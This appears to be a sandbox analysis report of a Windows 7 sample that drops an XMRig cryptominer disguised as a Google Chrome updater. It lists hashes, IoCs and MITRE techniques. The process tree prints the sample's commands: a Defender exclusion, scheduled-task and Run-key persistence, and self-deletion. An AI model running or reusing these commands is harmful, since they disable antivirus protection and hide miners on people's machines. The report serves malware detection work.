xmrig | 165a0de3cbb54178e47215a0ad412c91f1cbbcefc3c3d35d8124c5972d1c1950

max time kernel
419s
max time network
1797s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
23-01-2024 19:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Size

2.0MB
MD5

a16a669a09bf158058b83e04e69fe38e
SHA1

f6c94763850d9e590d86057139e8895a7aacdeea
SHA256

cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
SHA512

658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
SSDEEP

49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score

10^/10

xmrig miner upx

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs

description	pid	Process	procid_target
PID 2932 created 1216	2932	Y2JYGshMHJGuGREA.exe	10
PID 2932 created 1216	2932	Y2JYGshMHJGuGREA.exe	10
PID 2932 created 1216	2932	Y2JYGshMHJGuGREA.exe	10
PID 2932 created 1216	2932	Y2JYGshMHJGuGREA.exe	10
PID 2984 created 1216	2984	updater.exe	10
PID 2984 created 1216	2984	updater.exe	10
PID 2984 created 1216	2984	updater.exe	10
PID 2984 created 1216	2984	updater.exe	10
PID 2984 created 1216	2984	updater.exe	10

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 29 IoCs

miner

resource	yara_rule
behavioral29/memory/2460-72-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-74-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-78-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-80-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-82-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-84-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-86-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-88-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-95-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-97-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-99-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-101-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-103-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-105-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-107-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-109-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-111-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-113-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-115-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-117-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-119-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-126-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-128-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-130-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-132-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-134-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-136-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-138-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2460-140-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Deletes itself 1 IoCs

pid	Process
2516	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2984	updater.exe

Loads dropped DLL 1 IoCs

pid	Process
2960	taskeng.exe

UPX packed file 30 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral29/memory/2460-68-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-72-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-74-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-78-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-80-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-82-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-84-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-86-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-88-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-95-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-97-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-99-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-101-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-103-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-105-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-107-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-109-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-111-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-113-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-115-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-117-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-119-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-126-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-128-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-130-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-132-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-134-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-136-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-138-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2460-140-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2984 set thread context of 2952	2984	updater.exe	53
PID 2984 set thread context of 2460	2984	updater.exe	48

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	Y2JYGshMHJGuGREA.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2592	schtasks.exe
2720	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2948	WMIC.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 10f37f0dbc4fda01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
2932	Y2JYGshMHJGuGREA.exe
2932	Y2JYGshMHJGuGREA.exe
3048	powershell.exe
2932	Y2JYGshMHJGuGREA.exe
2932	Y2JYGshMHJGuGREA.exe
2668	powershell.exe
2932	Y2JYGshMHJGuGREA.exe
2932	Y2JYGshMHJGuGREA.exe
2932	Y2JYGshMHJGuGREA.exe
2932	Y2JYGshMHJGuGREA.exe
2500	powershell.exe
2984	updater.exe
2984	updater.exe
1964	powershell.exe
2984	updater.exe
2984	updater.exe
1460	powershell.exe
2984	updater.exe
2984	updater.exe
2984	updater.exe
2984	updater.exe
2952	conhost.exe
2952	conhost.exe
2984	updater.exe
2984	updater.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

description	pid	Process
Token: SeDebugPrivilege	3048	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	2984	updater.exe
Token: SeAssignPrimaryTokenPrivilege	2948	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2948	WMIC.exe
Token: SeSecurityPrivilege	2948	WMIC.exe
Token: SeTakeOwnershipPrivilege	2948	WMIC.exe
Token: SeLoadDriverPrivilege	2948	WMIC.exe
Token: SeSystemtimePrivilege	2948	WMIC.exe
Token: SeBackupPrivilege	2948	WMIC.exe
Token: SeRestorePrivilege	2948	WMIC.exe
Token: SeShutdownPrivilege	2948	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2948	WMIC.exe
Token: SeUndockPrivilege	2948	WMIC.exe
Token: SeManageVolumePrivilege	2948	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2948	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2948	WMIC.exe
Token: SeSecurityPrivilege	2948	WMIC.exe
Token: SeTakeOwnershipPrivilege	2948	WMIC.exe
Token: SeLoadDriverPrivilege	2948	WMIC.exe
Token: SeSystemtimePrivilege	2948	WMIC.exe
Token: SeBackupPrivilege	2948	WMIC.exe
Token: SeRestorePrivilege	2948	WMIC.exe
Token: SeShutdownPrivilege	2948	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2948	WMIC.exe
Token: SeUndockPrivilege	2948	WMIC.exe
Token: SeManageVolumePrivilege	2948	WMIC.exe
Token: SeLockMemoryPrivilege	2460	conhost.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2668 wrote to memory of 2592	2668	powershell.exe	32
PID 2668 wrote to memory of 2592	2668	powershell.exe	32
PID 2668 wrote to memory of 2592	2668	powershell.exe	32
PID 2516 wrote to memory of 2588	2516	cmd.exe	34
PID 2516 wrote to memory of 2588	2516	cmd.exe	34
PID 2516 wrote to memory of 2588	2516	cmd.exe	34
PID 2500 wrote to memory of 2772	2500	powershell.exe	39
PID 2500 wrote to memory of 2772	2500	powershell.exe	39
PID 2500 wrote to memory of 2772	2500	powershell.exe	39
PID 2960 wrote to memory of 2984	2960	taskeng.exe	40
PID 2960 wrote to memory of 2984	2960	taskeng.exe	40
PID 2960 wrote to memory of 2984	2960	taskeng.exe	40
PID 1460 wrote to memory of 2720	1460	powershell.exe	45
PID 1460 wrote to memory of 2720	1460	powershell.exe	45
PID 1460 wrote to memory of 2720	1460	powershell.exe	45
PID 2984 wrote to memory of 2952	2984	updater.exe	53
PID 648 wrote to memory of 2948	648	cmd.exe	47
PID 648 wrote to memory of 2948	648	cmd.exe	47
PID 648 wrote to memory of 2948	648	cmd.exe	47
PID 2984 wrote to memory of 2460	2984	updater.exe	48

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1216
- C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe
  "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2668
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:2592
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:2516
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2500
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:2772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1460
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:2720
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2460
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:1212
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe qtdiqnkejoz
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2952

C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
1⤵
PID:2588

C:\Windows\system32\taskeng.exe
taskeng.exe {BFA7C091-C6BD-433F-9BCB-1089BA33DB4F} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2960
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2984

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2948

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
369KB

MD5
571df8ec355959047880afdd783eba2c

SHA1
d45c7ed201b044dfa6e3336154cc670a80f5b30c

SHA256
06a374110e220cfcaf2e1df450700b7f1c9f78b4c56bccf62e448ac248effc44

SHA512
7ba02c952434419db09e289f368d9f58fe1cde6a88f6aae2511023d0592ff7ec8c938848d3c0727ec27a4b814b19d180cd0b3aeb80a5573402646d2f2b73ee53

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
394KB

MD5
1d0fa87c096899fc63c4b4c693b73ee2

SHA1
baafecfef120fb4807b977be79547ecc77a98a7f

SHA256
9b0362c8910531a737d14a5ae8da00d44b576cdd0d75b136cc050ccb1d738cb2

SHA512
2983acf173fffe47b83080b0beed83a8856d57e92d168567c726c523eb8d3cf8fa876f3be4de92ed85d50b60a0ebe64030f8b884df651dccc25d22a82d2ae6cc

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RTPPREPW3GCILH7SU1YC.temp

Filesize
7KB

MD5
64da943842968e4aa7d9d603f630dfa5

SHA1
f4f660e7c469d55eb7b98d03a5964db12d60bff4

SHA256
07405d07bbc71e5b353fbc692bcd56bade1bdaa6e5b58cb8f07c09a18a01e313

SHA512
8c6a3c07bedf3cf63b10797838fc85e398b8129b4b3b6980780e5fbd308524025972c90132ca58339cc5b53ebb503c72ae2863e35840cd6519b3581aa5b7deca

Download Submit
\Program Files\Google\Chrome\updater.exe

Filesize
398KB

MD5
7147367d1d1732db1a74d591de51634a

SHA1
977dc6608ece4215e7a32b811772256d08823570

SHA256
cbc1717162ad89ad95a7be198ed93739f5246a462d9182ac9460c395246a14b0

SHA512
2e3f9aa277afe4f64650c136e141887895cf0cdc8a7491dcb0f0d7796b1acea990e0e59f16b5f9436a97787af82297446b7b01543f7ac36e8d821cf6654f31bc

Download Submit
memory/1460-57-0x0000000001620000-0x00000000016A0000-memory.dmp

Filesize
512KB

Download
memory/1460-56-0x0000000001620000-0x00000000016A0000-memory.dmp

Filesize
512KB

Download
memory/1460-55-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

Filesize
9.6MB

Download
memory/1460-53-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

Filesize
9.6MB

Download
memory/1460-59-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

Filesize
9.6MB

Download
memory/1460-58-0x0000000001620000-0x00000000016A0000-memory.dmp

Filesize
512KB

Download
memory/1460-54-0x0000000001620000-0x00000000016A0000-memory.dmp

Filesize
512KB

Download
memory/1964-51-0x0000000001490000-0x0000000001510000-memory.dmp

Filesize
512KB

Download
memory/1964-52-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp

Filesize
9.6MB

Download
memory/1964-50-0x0000000001490000-0x0000000001510000-memory.dmp

Filesize
512KB

Download
memory/1964-46-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp

Filesize
9.6MB

Download
memory/1964-47-0x0000000001490000-0x0000000001510000-memory.dmp

Filesize
512KB

Download
memory/1964-49-0x0000000001490000-0x0000000001510000-memory.dmp

Filesize
512KB

Download
memory/1964-48-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp

Filesize
9.6MB

Download
memory/2460-88-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-103-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-140-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-138-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-136-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-134-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-132-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-130-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-128-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-126-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-119-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-117-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-115-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-113-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-111-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-109-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-107-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-105-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-101-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-99-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-97-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-95-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-68-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-67-0x0000000000110000-0x0000000000130000-memory.dmp

Filesize
128KB

Download
memory/2460-86-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-84-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-82-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-80-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-78-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-76-0x00000000007A0000-0x00000000007C0000-memory.dmp

Filesize
128KB

Download
memory/2460-75-0x00000000001A0000-0x00000000001C0000-memory.dmp

Filesize
128KB

Download
memory/2460-69-0x00000000001A0000-0x00000000001C0000-memory.dmp

Filesize
128KB

Download
memory/2460-70-0x00000000007A0000-0x00000000007C0000-memory.dmp

Filesize
128KB

Download
memory/2460-74-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2460-72-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2500-38-0x0000000002B40000-0x0000000002BC0000-memory.dmp

Filesize
512KB

Download
memory/2500-35-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

Filesize
9.6MB

Download
memory/2500-36-0x0000000002B40000-0x0000000002BC0000-memory.dmp

Filesize
512KB

Download
memory/2500-41-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

Filesize
9.6MB

Download
memory/2500-37-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

Filesize
9.6MB

Download
memory/2500-40-0x0000000002B40000-0x0000000002BC0000-memory.dmp

Filesize
512KB

Download
memory/2500-39-0x0000000002B40000-0x0000000002BC0000-memory.dmp

Filesize
512KB

Download
memory/2668-27-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp

Filesize
9.6MB

Download
memory/2668-25-0x0000000002A60000-0x0000000002AE0000-memory.dmp

Filesize
512KB

Download
memory/2668-24-0x0000000002A60000-0x0000000002AE0000-memory.dmp

Filesize
512KB

Download
memory/2668-19-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/2668-21-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp

Filesize
9.6MB

Download
